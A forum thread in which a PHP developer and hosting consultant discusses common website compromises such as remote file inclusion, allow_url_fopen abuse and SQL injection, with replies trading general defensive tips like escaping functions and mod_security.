Hi, I'm a professional (well I hope I am) PHP web developer. Also I'm a consulting programmer for a small web hosting company. In my job I have to track how websites were hacked and figure out a way to patch those websites in order to be less hackable in future. Unfortunately during my experience I found tons of web hosting security problems most of which are mainly due to PHP script vulnerabilities. We found out that more complicated and popular content management systems (as example of large php projects) such as WordPress, Joomla, Drupal, EzPublish, and around 95 others, are extremely vulnerable mainly due to "forgotten" or "insecure" php statements in conjunction with php global configurations which enable misc web visitors to "hack" into the system. Most of the common types seem to be remote file inclusions using unsecured variables. In order to have your website relatively hackproof you should follow my 3 step basic script php security guide. Note that those are not all possible, but are pretty much the most popular ones. Hope this helps. Cheers, Venetsian P.S. If you know some other security tips please post here! I'm constantly learning new stuff so please post!
It's good that you mentioned "allow_url_fopen". Hackers can get more done with it than you would think. Consider the following situation: A hacker gets into some admin panel and is able to execute php via a plugin or some other method. If allow_url_fopen is enabled, it makes it extremely easy to get more code up and running because they can just stream it from a server and write it to a file.
Yes, that's pretty much the case with hacked wordpress blogs where the theme files are overwritten with other content. Or upload a php trojan on the server. Its pretty common attack. Cheers, Venetsian.
Good tips for a beginner programmer. Any professional developer should know these, but great for those without the experience. I have also seen to use of like attacks lately for database injection ( MySQL ), which even mysql_real_escape string doesn't protect against. Things like this are an ongoing task, which is exactly why I read anything and everything about security in PHP. Infact, it's about all I read up on with PHP anymore, you can never be too secure, and new vunerabilities are discovered all the time. Thanks for sharing, and keep sharing what you find. BTW, using addcslashes protects against the like attack. You may also try excaping all meta characters with this, maybe doing so recursively.
isn't addslashes automatically done by the system if you have "magic quotes" on ? Just wondering if this might cause problems since they are assumed to do the same thing. Venetsian.
I found one additional thing. You should all have MOD_SECURITY and SUHOSIN enabled to prevent SQL Injections and protect wordpress from comment spam and bad bots. I tried it and works fine on my servers. Cheers, Venetsian